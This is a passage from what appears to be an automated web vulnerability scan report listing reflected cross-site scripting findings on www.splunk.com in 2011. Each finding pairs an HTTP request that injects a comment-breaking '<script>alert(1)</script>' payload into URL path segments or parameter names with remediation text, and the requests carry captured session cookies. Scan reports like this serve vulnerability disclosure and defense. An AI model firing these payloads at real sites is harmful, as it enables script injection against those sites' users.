__kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:18:29 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:48:29 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:48:29 GMT; path=/ ETag: 704408babd820f22c45c2118cc4ecc581296944310 Last-Modified: Sat, 05 Feb 2011 22:18:30 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18399
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 4b65f--><script>alert(1)</script>5ef7156cb2e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/partner-programs4b65f--><script>alert(1)</script>5ef7156cb2e/SP-CAAACED HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload 3e9a0--><script>alert(1)</script>3fa78d2d651 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/partner-programs/SP-CAAACED3e9a0--><script>alert(1)</script>3fa78d2d651 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.583. http://www.splunk.com/view/partner-programs/SP-CAAACED [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/partner-programs/SP-CAAACED
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ae883--><script>alert(1)</script>4cfbb6dd937 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/partner-programs/SP-CAAACED?ae883--><script>alert(1)</script>4cfbb6dd937=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:17:33 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23717
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload e0baa--><script>alert(1)</script>ff9655a5702 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /viewe0baa--><script>alert(1)</script>ff9655a5702/product-tour/SP-CAAAAGV HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:14:30 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:44:30 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:44:30 GMT; path=/ ETag: 430093ac36dde99606192c99a40d63b31296944070 Last-Modified: Sat, 05 Feb 2011 22:14:30 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18383
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 94af9--><script>alert(1)</script>0a646c51a07 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/product-tour94af9--><script>alert(1)</script>0a646c51a07/SP-CAAAAGV HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload c0811--><script>alert(1)</script>45674de8132 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/product-tour/SP-CAAAAGVc0811--><script>alert(1)</script>45674de8132 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.587. http://www.splunk.com/view/product-tour/SP-CAAAAGV [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/product-tour/SP-CAAAAGV
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 1e7d6--><script>alert(1)</script>b86e20e506a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/product-tour/SP-CAAAAGV?1e7d6--><script>alert(1)</script>b86e20e506a=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:13:53 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 103f9f7f8215d15990f0d507a8e205471296944034 Last-Modified: Sat, 05 Feb 2011 22:13:54 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27809
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 807a2--><script>alert(1)</script>91ab61ec940 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view807a2--><script>alert(1)</script>91ab61ec940/professional-services/SP-CAAABH9 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload 61dcc--><script>alert(1)</script>1db00d188d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/professional-services61dcc--><script>alert(1)</script>1db00d188d1/SP-CAAABH9 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload 3015d--><script>alert(1)</script>ed02e14b7a7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/professional-services/SP-CAAABH93015d--><script>alert(1)</script>ed02e14b7a7 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.591. http://www.splunk.com/view/professional-services/SP-CAAABH9 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/professional-services/SP-CAAABH9
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload f4445--><script>alert(1)</script>c7249b67761 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/professional-services/SP-CAAABH9?f4445--><script>alert(1)</script>c7249b67761=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:19:53 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 37390
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 7309a--><script>alert(1)</script>a075b8cd53e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view7309a--><script>alert(1)</script>a075b8cd53e/resources/SP-CAAACGF HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload 88525--><script>alert(1)</script>542705b5975 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
